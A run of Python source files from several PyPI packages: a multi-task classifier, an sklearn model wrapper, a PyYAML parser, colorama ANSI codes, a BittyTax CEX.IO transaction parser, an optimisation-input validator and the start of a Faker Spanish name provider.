"""get all trained parameters
Returns:
(tuple): tuple containing:
([np.array(np.array)]): training weight matrix
(float): final loss
"""
return self.W, self.funcVal
def softmax(self, z):
"""Softmax function squash to one dimension
Args:
z (np.array): input array
Returns:
(np.array): out put softmax-ed
"""
z -= np.max(z)
sm = (np.exp(z).T / np.sum(np.exp(z),axis=1)).T
return sm
def predict(self, X):
"""Predict with test data
Args:
X [(np.array(np.array))]: input to predict, shape (t, n, d)
Returns:
([np.array()]): predict matrix, shape (t, n ,1)
"""
pred = []
for i in range(self.task_num):
pp = np.reshape(X[i], (-1, self.dimension)) @ self.W[:, i]
probs = self.softmax(pp)
preds = np.argmax(probs,axis=1)
if(self.encode_mtx!=None):
temp = []
for p in preds:
temp.append(self.decode_mtx[p])
preds = np.array(temp)
pred.append(preds)
return pred
def score(self, X, Y):
pred = self.predict(X)
correct = 0
total = 0
for i, j in zip(Y, pred):
for k,l in zip(i,j):
if(k == l):
correct+=1
total+=1
acc = correct/total
return acc | PypiClean |
/Bayesian1990_model-3.0.tar.gz/Bayesian1990_model-3.0/Bayesian1990_model/model_class.py | import pandas as pd
#Import machine learning packages
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split #split
#Define a general model class
class model():
"""
general model class for implementing modelling.
Attributes:
X (pandas dataframe) representing the design matrix
y (pandas dataframe) representing the response variable
"""
def __init__(self,X=pd.DataFrame() ,y=pd.DataFrame() ):
self.X=X
self.y=y
self.y
self.X_train=pd.DataFrame()
self.X_test=pd.DataFrame()
self.y_train=pd.DataFrame()
self.y_test=pd.DataFrame()
def load_dataset(self,file_name,response):
"""Method to import data from a csv file (in the same directory). The data object is just a dictionary containing all the available information
and then converted to pandas dataframe respectively assigned to design matrix X and response y.
Args:
None
Returns:
None
"""
#import csv dataset
df = pd.read_csv(file_name)
#update design matrix X in the main corpus of model class
self.X=df.drop(columns =response)
#update response y in the main corpus of model class
self.y=df[response]
def split_method(self):
"""Method to split the response and design matrix X and response y to train and test sets respectively, thus
X_train, X_test, y_train, y_test using the train_test_split() method from sklearn.
Args:
None
Returns:
None
"""
#Split train/test set and update the dataframes self.X_train, self.X_test, self.y_train and self.y_test respectively
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size = 0.3, random_state=2022) | PypiClean |
/CustomPipeline-0.0.3-py3-none-any.whl/rplibs/yaml/yaml_py3/parser.py |
__all__ = ['Parser', 'ParserError']
from .error import MarkedYAMLError
from .tokens import *
from .events import *
from .scanner import *
class ParserError(MarkedYAMLError):
pass
class Parser:
# Since writing a recursive-descendant parser is a straightforward task, we
# do not give many comments here.
DEFAULT_TAGS = {
'!': '!',
'!!': 'tag:yaml.org,2002:',
}
def __init__(self):
self.current_event = None
self.yaml_version = None
self.tag_handles = {}
self.states = []
self.marks = []
self.state = self.parse_stream_start
def dispose(self):
# Reset the state attributes (to clear self-references)
self.states = []
self.state = None
def check_event(self, *choices):
# Check the type of the next event.
if self.current_event is None:
if self.state:
self.current_event = self.state()
if self.current_event is not None:
if not choices:
return True
for choice in choices:
if isinstance(self.current_event, choice):
return True
return False
def peek_event(self):
# Get the next event.
if self.current_event is None:
if self.state:
self.current_event = self.state()
return self.current_event
def get_event(self):
# Get the next event and proceed further.
if self.current_event is None:
if self.state:
self.current_event = self.state()
value = self.current_event
self.current_event = None
return value
# stream ::= STREAM-START implicit_document? explicit_document* STREAM-END
# implicit_document ::= block_node DOCUMENT-END*
# explicit_document ::= DIRECTIVE* DOCUMENT-START block_node? DOCUMENT-END*
def parse_stream_start(self):
# Parse the stream start.
token = self.get_token()
event = StreamStartEvent(token.start_mark, token.end_mark,
encoding=token.encoding)
# Prepare the next state.
self.state = self.parse_implicit_document_start
return event
def parse_implicit_document_start(self):
# Parse an implicit document.
if not self.check_token(DirectiveToken, DocumentStartToken,
StreamEndToken):
self.tag_handles = self.DEFAULT_TAGS
token = self.peek_token()
start_mark = end_mark = token.start_mark
event = DocumentStartEvent(start_mark, end_mark,
explicit=False)
# Prepare the next state.
self.states.append(self.parse_document_end)
self.state = self.parse_block_node
return event
else:
return self.parse_document_start()
def parse_document_start(self):
# Parse any extra document end indicators.
while self.check_token(DocumentEndToken):
self.get_token()
# Parse an explicit document.
if not self.check_token(StreamEndToken):
token = self.peek_token()
start_mark = token.start_mark
version, tags = self.process_directives()
if not self.check_token(DocumentStartToken):
raise ParserError(None, None,
"expected '<document start>', but found %r"
% self.peek_token().id,
self.peek_token().start_mark)
token = self.get_token()
end_mark = token.end_mark
event = DocumentStartEvent(start_mark, end_mark,
explicit=True, version=version, tags=tags)
self.states.append(self.parse_document_end)
self.state = self.parse_document_content
else:
# Parse the end of the stream.
token = self.get_token()
event = StreamEndEvent(token.start_mark, token.end_mark)
assert not self.states
assert not self.marks
self.state = None
return event
def parse_document_end(self):
# Parse the document end.
token = self.peek_token()
start_mark = end_mark = token.start_mark
explicit = False
if self.check_token(DocumentEndToken):
token = self.get_token()
end_mark = token.end_mark
explicit = True
event = DocumentEndEvent(start_mark, end_mark,
explicit=explicit)
# Prepare the next state.
self.state = self.parse_document_start
return event
def parse_document_content(self):
if self.check_token(DirectiveToken,
DocumentStartToken, DocumentEndToken, StreamEndToken):
event = self.process_empty_scalar(self.peek_token().start_mark)
self.state = self.states.pop()
return event
else:
return self.parse_block_node()
def process_directives(self):
self.yaml_version = None
self.tag_handles = {}
while self.check_token(DirectiveToken):
token = self.get_token()
if token.name == 'YAML':
if self.yaml_version is not None:
raise ParserError(None, None,
"found duplicate YAML directive", token.start_mark)
major, minor = token.value
if major != 1:
raise ParserError(None, None,
"found incompatible YAML document (version 1.* is required)",
token.start_mark)
self.yaml_version = token.value
elif token.name == 'TAG':
handle, prefix = token.value
if handle in self.tag_handles:
raise ParserError(None, None,
"duplicate tag handle %r" % handle,
token.start_mark)
self.tag_handles[handle] = prefix
if self.tag_handles:
value = self.yaml_version, self.tag_handles.copy()
else:
value = self.yaml_version, None
for key in self.DEFAULT_TAGS:
if key not in self.tag_handles:
self.tag_handles[key] = self.DEFAULT_TAGS[key]
return value
# block_node_or_indentless_sequence ::= ALIAS
# | properties (block_content | indentless_block_sequence)?
# | block_content
# | indentless_block_sequence
# block_node ::= ALIAS
# | properties block_content?
# | block_content
# flow_node ::= ALIAS
# | properties flow_content?
# | flow_content
# properties ::= TAG ANCHOR? | ANCHOR TAG?
# block_content ::= block_collection | flow_collection | SCALAR
# flow_content ::= flow_collection | SCALAR
# block_collection ::= block_sequence | block_mapping
# flow_collection ::= flow_sequence | flow_mapping
def parse_block_node(self):
return self.parse_node(block=True)
def parse_flow_node(self):
return self.parse_node()
def parse_block_node_or_indentless_sequence(self):
return self.parse_node(block=True, indentless_sequence=True)
def parse_node(self, block=False, indentless_sequence=False):
if self.check_token(AliasToken):
token = self.get_token()
event = AliasEvent(token.value, token.start_mark, token.end_mark)
self.state = self.states.pop()
else:
anchor = None
tag = None
start_mark = end_mark = tag_mark = None
if self.check_token(AnchorToken):
token = self.get_token()
start_mark = token.start_mark
end_mark = token.end_mark
anchor = token.value
if self.check_token(TagToken):
token = self.get_token()
tag_mark = token.start_mark
end_mark = token.end_mark
tag = token.value
elif self.check_token(TagToken):
token = self.get_token()
start_mark = tag_mark = token.start_mark
end_mark = token.end_mark
tag = token.value
if self.check_token(AnchorToken):
token = self.get_token()
end_mark = token.end_mark
anchor = token.value
if tag is not None:
handle, suffix = tag
if handle is not None:
if handle not in self.tag_handles:
raise ParserError("while parsing a node", start_mark,
"found undefined tag handle %r" % handle,
tag_mark)
tag = self.tag_handles[handle]+suffix
else:
tag = suffix
#if tag == '!':
# raise ParserError("while parsing a node", start_mark,
# "found non-specific tag '!'", tag_mark,
# "Please check 'http://pyyaml.org/wiki/YAMLNonSpecificTag' and share your opinion.")
if start_mark is None:
start_mark = end_mark = self.peek_token().start_mark
event = None
implicit = (tag is None or tag == '!')
if indentless_sequence and self.check_token(BlockEntryToken):
end_mark = self.peek_token().end_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark)
self.state = self.parse_indentless_sequence_entry
else:
if self.check_token(ScalarToken):
token = self.get_token()
end_mark = token.end_mark
if (token.plain and tag is None) or tag == '!':
implicit = (True, False)
elif tag is None:
implicit = (False, True)
else:
implicit = (False, False)
event = ScalarEvent(anchor, tag, implicit, token.value,
start_mark, end_mark, style=token.style)
self.state = self.states.pop()
elif self.check_token(FlowSequenceStartToken):
end_mark = self.peek_token().end_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=True)
self.state = self.parse_flow_sequence_first_entry
elif self.check_token(FlowMappingStartToken):
end_mark = self.peek_token().end_mark
event = MappingStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=True)
self.state = self.parse_flow_mapping_first_key
elif block and self.check_token(BlockSequenceStartToken):
end_mark = self.peek_token().start_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=False)
self.state = self.parse_block_sequence_first_entry
elif block and self.check_token(BlockMappingStartToken):
end_mark = self.peek_token().start_mark
event = MappingStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=False)
self.state = self.parse_block_mapping_first_key
elif anchor is not None or tag is not None:
# Empty scalars are allowed even if a tag or an anchor is
# specified.
event = ScalarEvent(anchor, tag, (implicit, False), '',
start_mark, end_mark)
self.state = self.states.pop()
else:
if block:
node = 'block'
else:
node = 'flow'
token = self.peek_token()
raise ParserError("while parsing a %s node" % node, start_mark,
"expected the node content, but found %r" % token.id,
token.start_mark)
return event
# block_sequence ::= BLOCK-SEQUENCE-START (BLOCK-ENTRY block_node?)* BLOCK-END
def parse_block_sequence_first_entry(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_block_sequence_entry()
def parse_block_sequence_entry(self):
if self.check_token(BlockEntryToken):
token = self.get_token()
if not self.check_token(BlockEntryToken, BlockEndToken):
self.states.append(self.parse_block_sequence_entry)
return self.parse_block_node()
else:
self.state = self.parse_block_sequence_entry
return self.process_empty_scalar(token.end_mark)
if not self.check_token(BlockEndToken):
token = self.peek_token()
raise ParserError("while parsing a block collection", self.marks[-1],
"expected <block end>, but found %r" % token.id, token.start_mark)
token = self.get_token()
event = SequenceEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
# indentless_sequence ::= (BLOCK-ENTRY block_node?)+
def parse_indentless_sequence_entry(self):
if self.check_token(BlockEntryToken):
token = self.get_token()
if not self.check_token(BlockEntryToken,
KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_indentless_sequence_entry)
return self.parse_block_node()
else:
self.state = self.parse_indentless_sequence_entry
return self.process_empty_scalar(token.end_mark)
token = self.peek_token()
event = SequenceEndEvent(token.start_mark, token.start_mark)
self.state = self.states.pop()
return event
# block_mapping ::= BLOCK-MAPPING_START
# ((KEY block_node_or_indentless_sequence?)?
# (VALUE block_node_or_indentless_sequence?)?)*
# BLOCK-END
def parse_block_mapping_first_key(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_block_mapping_key()
def parse_block_mapping_key(self):
if self.check_token(KeyToken):
token = self.get_token()
if not self.check_token(KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_block_mapping_value)
return self.parse_block_node_or_indentless_sequence()
else:
self.state = self.parse_block_mapping_value
return self.process_empty_scalar(token.end_mark)
if not self.check_token(BlockEndToken):
token = self.peek_token()
raise ParserError("while parsing a block mapping", self.marks[-1],
"expected <block end>, but found %r" % token.id, token.start_mark)
token = self.get_token()
event = MappingEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_block_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_block_mapping_key)
return self.parse_block_node_or_indentless_sequence()
else:
self.state = self.parse_block_mapping_key
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_block_mapping_key
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
# flow_sequence ::= FLOW-SEQUENCE-START
# (flow_sequence_entry FLOW-ENTRY)*
# flow_sequence_entry?
# FLOW-SEQUENCE-END
# flow_sequence_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
#
# Note that while production rules for both flow_sequence_entry and
# flow_mapping_entry are equal, their interpretations are different.
# For `flow_sequence_entry`, the part `KEY flow_node? (VALUE flow_node?)?`
# generate an inline mapping (set syntax).
def parse_flow_sequence_first_entry(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_flow_sequence_entry(first=True)
def parse_flow_sequence_entry(self, first=False):
if not self.check_token(FlowSequenceEndToken):
if not first:
if self.check_token(FlowEntryToken):
self.get_token()
else:
token = self.peek_token()
raise ParserError("while parsing a flow sequence", self.marks[-1],
"expected ',' or ']', but got %r" % token.id, token.start_mark)
if self.check_token(KeyToken):
token = self.peek_token()
event = MappingStartEvent(None, None, True,
token.start_mark, token.end_mark,
flow_style=True)
self.state = self.parse_flow_sequence_entry_mapping_key
return event
elif not self.check_token(FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry)
return self.parse_flow_node()
token = self.get_token()
event = SequenceEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_flow_sequence_entry_mapping_key(self):
token = self.get_token()
if not self.check_token(ValueToken,
FlowEntryToken, FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry_mapping_value)
return self.parse_flow_node()
else:
self.state = self.parse_flow_sequence_entry_mapping_value
return self.process_empty_scalar(token.end_mark)
def parse_flow_sequence_entry_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(FlowEntryToken, FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry_mapping_end)
return self.parse_flow_node()
else:
self.state = self.parse_flow_sequence_entry_mapping_end
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_flow_sequence_entry_mapping_end
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
def parse_flow_sequence_entry_mapping_end(self):
self.state = self.parse_flow_sequence_entry
token = self.peek_token()
return MappingEndEvent(token.start_mark, token.start_mark)
# flow_mapping ::= FLOW-MAPPING-START
# (flow_mapping_entry FLOW-ENTRY)*
# flow_mapping_entry?
# FLOW-MAPPING-END
# flow_mapping_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
def parse_flow_mapping_first_key(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_flow_mapping_key(first=True)
def parse_flow_mapping_key(self, first=False):
if not self.check_token(FlowMappingEndToken):
if not first:
if self.check_token(FlowEntryToken):
self.get_token()
else:
token = self.peek_token()
raise ParserError("while parsing a flow mapping", self.marks[-1],
"expected ',' or '}', but got %r" % token.id, token.start_mark)
if self.check_token(KeyToken):
token = self.get_token()
if not self.check_token(ValueToken,
FlowEntryToken, FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_value)
return self.parse_flow_node()
else:
self.state = self.parse_flow_mapping_value
return self.process_empty_scalar(token.end_mark)
elif not self.check_token(FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_empty_value)
return self.parse_flow_node()
token = self.get_token()
event = MappingEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_flow_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(FlowEntryToken, FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_key)
return self.parse_flow_node()
else:
self.state = self.parse_flow_mapping_key
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_flow_mapping_key
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
def parse_flow_mapping_empty_value(self):
self.state = self.parse_flow_mapping_key
return self.process_empty_scalar(self.peek_token().start_mark)
def process_empty_scalar(self, mark):
return ScalarEvent(None, None, (True, False), '', mark, mark) | PypiClean |
/CustomPipeline-0.0.3-py3-none-any.whl/rplibs/colorama/ansi.py | CSI = '\033['
OSC = '\033]'
BEL = '\007'
def code_to_chars(code):
return CSI + str(code) + 'm'
def set_title(title):
return OSC + '2;' + title + BEL
def clear_screen(mode=2):
return CSI + str(mode) + 'J'
def clear_line(mode=2):
return CSI + str(mode) + 'K'
class AnsiCodes(object):
def __init__(self):
# the subclasses declare class attributes which are numbers.
# Upon instantiation we define instance attributes, which are the same
# as the class attributes but wrapped with the ANSI escape sequence
for name in dir(self):
if not name.startswith('_'):
value = getattr(self, name)
setattr(self, name, code_to_chars(value))
class AnsiCursor(object):
def UP(self, n=1):
return CSI + str(n) + 'A'
def DOWN(self, n=1):
return CSI + str(n) + 'B'
def FORWARD(self, n=1):
return CSI + str(n) + 'C'
def BACK(self, n=1):
return CSI + str(n) + 'D'
def POS(self, x=1, y=1):
return CSI + str(y) + ';' + str(x) + 'H'
class AnsiFore(AnsiCodes):
BLACK = 30
RED = 31
GREEN = 32
YELLOW = 33
BLUE = 34
MAGENTA = 35
CYAN = 36
WHITE = 37
RESET = 39
# These are fairly well supported, but not part of the standard.
LIGHTBLACK_EX = 90
LIGHTRED_EX = 91
LIGHTGREEN_EX = 92
LIGHTYELLOW_EX = 93
LIGHTBLUE_EX = 94
LIGHTMAGENTA_EX = 95
LIGHTCYAN_EX = 96
LIGHTWHITE_EX = 97
class AnsiBack(AnsiCodes):
BLACK = 40
RED = 41
GREEN = 42
YELLOW = 43
BLUE = 44
MAGENTA = 45
CYAN = 46
WHITE = 47
RESET = 49
# These are fairly well supported, but not part of the standard.
LIGHTBLACK_EX = 100
LIGHTRED_EX = 101
LIGHTGREEN_EX = 102
LIGHTYELLOW_EX = 103
LIGHTBLUE_EX = 104
LIGHTMAGENTA_EX = 105
LIGHTCYAN_EX = 106
LIGHTWHITE_EX = 107
class AnsiStyle(AnsiCodes):
BRIGHT = 1
DIM = 2
NORMAL = 22
RESET_ALL = 0
Fore = AnsiFore()
Back = AnsiBack()
Style = AnsiStyle()
Cursor = AnsiCursor() | PypiClean |
/BittyTax-0.5.1.tar.gz/BittyTax-0.5.1/src/bittytax/conv/parsers/cexio.py |
import re
import sys
from decimal import ROUND_DOWN, Decimal
from colorama import Fore
from ...config import config
from ..dataparser import DataParser
from ..exceptions import DataRowError, UnexpectedContentError, UnexpectedTypeError
from ..out_record import TransactionOutRecord
WALLET = "CEX.IO"
def parse_cexio(data_rows, parser, **_kwargs):
tx_times = {}
for dr in data_rows:
if dr.row_dict["DateUTC"] in tx_times:
tx_times[dr.row_dict["DateUTC"]].append(dr)
else:
tx_times[dr.row_dict["DateUTC"]] = [dr]
for data_row in data_rows:
if config.debug:
sys.stderr.write(
"%sconv: row[%s] %s\n"
% (Fore.YELLOW, parser.in_header_row_num + data_row.line_num, data_row)
)
if data_row.parsed:
continue
try:
_parse_cexio_row(tx_times, parser, data_row)
except DataRowError as e:
data_row.failure = e
def _parse_cexio_row(tx_times, parser, data_row):
row_dict = data_row.row_dict
data_row.timestamp = DataParser.parse_timestamp(row_dict["DateUTC"])
if row_dict["FeeAmount"]:
fee_quantity = row_dict["FeeAmount"]
fee_asset = row_dict["FeeSymbol"]
else:
fee_quantity = None
fee_asset = ""
if row_dict["Type"] == "deposit":
if row_dict["Balance"] == "pending":
return
if row_dict["Comment"].endswith("Completed") or row_dict["Comment"].startswith("Confirmed"):
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_DEPOSIT,
data_row.timestamp,
buy_quantity=row_dict["Amount"],
buy_asset=row_dict["Symbol"],
fee_quantity=fee_quantity,
fee_asset=fee_asset,
wallet=WALLET,
note=row_dict["Comment"],
)
elif row_dict["Type"] == "withdraw":
if fee_quantity:
sell_quantity = abs(Decimal(row_dict["Amount"])) - Decimal(fee_quantity)
else:
sell_quantity = abs(Decimal(row_dict["Amount"]))
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_WITHDRAWAL,
data_row.timestamp,
sell_quantity=sell_quantity,
sell_asset=row_dict["Symbol"],
fee_quantity=fee_quantity,
fee_asset=fee_asset,
wallet=WALLET,
note=row_dict["Comment"],
)
elif row_dict["Type"] in ("buy", "sell"):
trade_info = _get_trade_info(row_dict["Comment"], row_dict["Type"])
if trade_info is None:
raise UnexpectedContentError(
parser.in_header.index("Comment"), "Comment", row_dict["Comment"]
)
if trade_info[0] == "Bought":
buy_quantity = row_dict["Amount"]
buy_asset = row_dict["Symbol"]
sell_quantity = Decimal(trade_info[1]) * Decimal(trade_info[3])
sell_asset = trade_info[4]
if sell_asset in config.fiat_list:
sell_quantity = sell_quantity.quantize(Decimal("0.00"), ROUND_DOWN)
elif trade_info[0] == "Sold":
if fee_quantity:
buy_quantity = Decimal(row_dict["Amount"]) + Decimal(fee_quantity)
else:
buy_quantity = Decimal(row_dict["Amount"])
buy_asset = row_dict["Symbol"]
sell_quantity = trade_info[1]
sell_asset = trade_info[2]
else:
# Skip corresponding "Buy/Sell Order" row
return
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_TRADE,
data_row.timestamp,
buy_quantity=buy_quantity,
buy_asset=buy_asset,
sell_quantity=sell_quantity,
sell_asset=sell_asset,
fee_quantity=fee_quantity,
fee_asset=fee_asset,
wallet=WALLET,
note=row_dict["Comment"],
)
elif row_dict["Type"] in ("wallet_buy", "wallet_sell"):
_make_trade(tx_times[row_dict["DateUTC"]], data_row, parser)
elif row_dict["Type"] in ("referral", "checksum", "costsNothing"):
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_GIFT_RECEIVED,
data_row.timestamp,
buy_quantity=row_dict["Amount"],
buy_asset=row_dict["Symbol"],
wallet=WALLET,
note=row_dict["Comment"],
)
elif row_dict["Type"] == "staking":
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_STAKING,
data_row.timestamp,
buy_quantity=row_dict["Amount"],
buy_asset=row_dict["Symbol"],
wallet=WALLET,
note=row_dict["Comment"],
)
elif row_dict["Type"] == "cancel":
# Skip
return
else:
raise UnexpectedTypeError(parser.in_header.index("Type"), "Type", row_dict["Type"])
def _get_trade_info(comment, t_type):
if t_type == "buy":
match = re.match(
r"^(Bought) (\d+|\d+\.\d+) (\w+) at (\d+|\d+\.\d+) (\w+)$|^Buy Order.*$",
comment,
)
elif t_type == "sell":
match = re.match(
r"^(Sold) (\d+|\d+\.\d+) (\w+) at (\d+|\d+\.\d+) (\w+)$|^Sell Order.*$",
comment,
)
else:
return None
if match:
return match.groups()
return None
def _make_trade(tx_times, data_row, parser):
buy_rows = [dr for dr in tx_times if dr.row_dict["Type"] == "wallet_buy"]
sell_rows = [dr for dr in tx_times if dr.row_dict["Type"] == "wallet_sell"]
if len(buy_rows) == 1 and len(sell_rows) == 1:
if data_row == buy_rows[0]:
sell_rows[0].timestamp = data_row.timestamp
sell_rows[0].parsed = True
else:
buy_rows[0].timestamp = data_row.timestamp
buy_rows[0].parsed = True
# Assumes there are no trading fees
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_TRADE,
data_row.timestamp,
buy_quantity=buy_rows[0].row_dict["Amount"],
buy_asset=buy_rows[0].row_dict["Symbol"],
sell_quantity=abs(Decimal(sell_rows[0].row_dict["Amount"])),
sell_asset=sell_rows[0].row_dict["Symbol"],
wallet=WALLET,
)
else:
data_row.failure = UnexpectedContentError(
parser.in_header.index("Type"), "Type", data_row.row_dict["Type"]
)
DataParser(
DataParser.TYPE_EXCHANGE,
"CEX.IO",
[
"DateUTC",
"Amount",
"Symbol",
"Balance",
"Type",
"Pair",
"FeeSymbol",
"FeeAmount",
"Comment",
],
worksheet_name="CEX.IO",
all_handler=parse_cexio,
) | PypiClean |
/OPML_Methods-0.1.14.tar.gz/OPML_Methods-0.1.14/OPML_Methods/input_validation.py | import re
from typing import Optional
from sympy.parsing.sympy_parser import parse_expr
from sympy import sympify, exp, Symbol
ALLOWED_OPERATIONS = ['log', 'ln', 'factorial', 'sin', 'cos', 'tan', 'cot', 'pi', 'exp', 'sqrt', 'root', 'abs']
def check_expression(expression: str) -> str:
"""
Функция для проверки выражения на корректность. Принимает на вход строку с функцией
в аналитическом виде, возвращает строку. Функция обязательно должна быть
только от аргументов вида x1, x2, ..., xn.
Parameters:
------------
expression: str
Строка содержащая функцию для проверки.
Returns:
-------
str: str
Функция в виде строки.
"""
expression = expression.strip()
if expression.find('—') != -1:
expression = expression.replace('—', '-')
if expression.find('–') != -1:
expression = expression.replace('–', '-')
checker = compile(expression, '<string>', 'eval') # Может выдать SyntaxError, если выражение некорректно
var_checker = re.compile(r'^x{1}[0-9]+$')
for name in checker.co_names:
if name not in ALLOWED_OPERATIONS:
if not (var_checker.match(name) and name != 'x0'):
raise NameError(f"The use of '{name}' is not allowed")
function = sympify(expression, {'e': exp(1)}, convert_xor=True)
return str(function)
def check_restr(restr_str: str, method: str, splitter: Optional[str] = ';') -> str:
"""
Проверяет корректность и читаемость ограничений.
Parameters
----------
restr_str: str
Строка с ограничениями в аналитическом виде.
method: str
Название метода для решения задачи.
splitter: Optional[str] = ';'
Строка-разделитель, которым разделены градиенты.
Returns
-------
restrs: str
Строка с ограничениями в аналитическом виде, разделенные ';'.
"""
g = restr_str.split(splitter)
ans = []
for i in range(len(g)):
if method == 'Newton':
if g[i].find('<=') != -1 or g[i].find('>=') != -1:
raise ValueError(f'Для метода {method} ограничения должны быть равенствами.')
else:
if g[i].count('=') != 1:
raise ValueError(f'Неправильно задано ограничение {g[i]}')
left, right = g[i].split('=')
left, right = sympify(check_expression(left)), sympify(check_expression(right))
left = left - right
right = right - right
checked = str(left) + '=' + str(right)
ans.append(checked)
if method == 'primal-dual':
if g[i].count('=') > 1:
raise ValueError(f'Неправильно задано ограничение {g[i]}')
if g[i].find('>=') != -1:
splitt = '>='
elif g[i].find('<=') != -1:
splitt = '<='
else:
raise ValueError(f'Неправильно задано ограничение {g[i]}')
left, right = g[i].split(splitt)
left, right = sympify(check_expression(left)), sympify(check_expression(right))
if splitt == '>=':
left -= right
if splitt == '<=':
left = -left
right = -right
left -= right
right -= right
checked = str(left) + '>=' + str(right)
ans.append(checked)
if method == 'log_barrier':
if g[i].find('<=') != -1 or g[i].find('>=') != -1:
if g[i].count('=') > 1:
raise ValueError(f'Неправильно задано ограничение {g[i]}')
if g[i].find('>=') != -1:
splitt = '>='
elif g[i].find('<=') != -1:
splitt = '<='
left, right = g[i].split(splitt)
left, right = sympify(check_expression(left)), sympify(check_expression(right))
if splitt == '>=':
left -= right
if splitt == '<=':
left = -left
right = -right
left -= right
right -= right
checked = str(left) + '>=' + str(right)
ans.append(checked)
else:
raise ValueError(f'''Для метода {method} ограничения типа равенств пока
не поддерживаются, можем добавить.''')
# if g[i].count('=') != 1:
# raise ValueError(f'Неправильно задано ограничение {g[i]}')
# print(ans)
restrs = ";".join(ans)
return restrs
def check_float(value: str) -> float:
"""
Проверяет введеное значение на корректность и на наличие инъекций, а затем
конвертирует в float, если это возможно. Поддерживает операции с pi и e.
Parameters:
------------
values: str
строка в которой содержится выражение
Returns:
-------
float
значение переведенное из строки в float
"""
value = value.strip()
if value.find('^') != -1:
value = value.replace('^', '**')
checker = compile(value, '<string>', 'eval') # Может выдать SyntaxError, если выражение некорректно
for name in checker.co_names:
if name not in ['pi', 'e', 'exp']:
raise ValueError(f'Нельзя использовать имя {name}')
value = float(parse_expr(value, {'e': exp(1)}))
return value
def check_point(point_str: str, function: str, restrs: str, method: str, splitter: Optional[str] = ';') -> str:
"""
Функция проверяет корректность введеной точки x0.
Parameters
----------
point_str: str
Координаты точки в виде строки. Если строка пустая или 'None', то будет применяться метод первой фазы.
function: str
Функция минимизации. Нужна для проверки корректности точки и размерностей.
restrs: str
Строка ограничений. Нужна для проверки размерности точки и для проверки точки на внутренность.
method: str
Название метода для решения задачи.
splitter: Optional[str] = ';'
Разделитель, которым разделены координаты в строке.
Returns
-------
point: str
Строка с координатами точки, разделенные знаком ';'.
"""
if point_str == '' or point_str == 'None':
return ''
coords = point_str.split(splitter)
for i in range(len(coords)):
coords[i] = str(check_float(coords[i]))
f = sympify(function)
if method == 'Newton':
r = [sympify(i.split('=')[0]) for i in restrs.split(';')]
elif method == 'primal-dual':
r = [sympify(i.split('>=')[0]) if i.find('>=') != -1 else sympify(i.split('<=')[0]) for i in restrs.split(';')]
elif method == 'log_barrier':
r = [sympify(i.split('>=')[0]) if i.find('>=') != -1 else sympify(i.split('<=')[0]) for i in restrs.split(';')]
max_ind = 0
for i in [f]+r:
i = max([int(str(j)[1:]) for j in i.free_symbols])
max_ind = max(max_ind, i)
if max_ind != len(coords):
raise ValueError('Размерность точки не сходится с размерностями функций из задачи')
d = {f'x{i+1}': float(coords[i]) for i in range(len(coords))}
if method == 'primal-dual':
for i in r:
# print(i.subs(d), i)
if float(i.subs(d)) <= 0:
raise ValueError('Точка не внутренняя')
if method == 'log_barrier':
for i in r:
# print(i.subs(d), i)
if float(i.subs(d)) <= 0:
raise ValueError('Точка не внутренняя')
points = ';'.join(coords)
return points
if __name__ == '__main__':
func = 'x1**2 - x3'
restr = 'x2 - x4 >= 3'
meth = 'log_barrier'
start = '0;4;0;0'
# костяк проверок
s = check_expression(func)
# # print(s)
r = check_restr(restr, method=meth)
# # print(r)
#
p = check_point(start, s, r, meth)
# # print(p) | PypiClean |
/Faker-19.3.1.tar.gz/Faker-19.3.1/faker/providers/person/es_ES/__init__.py | from typing import Tuple
from ..es import Provider as PersonProvider
class Provider(PersonProvider):
formats_male: Tuple[str, ...] = (
"{{first_name_male}} {{last_name}} {{last_name}}",
"{{first_name_male}} {{last_name}} {{last_name}}",
"{{first_name_male}} {{last_name}} {{last_name}}",
"{{first_name_male}} {{last_name}} {{last_name}}",
"{{first_name_male}} {{last_name}} {{last_name}}",
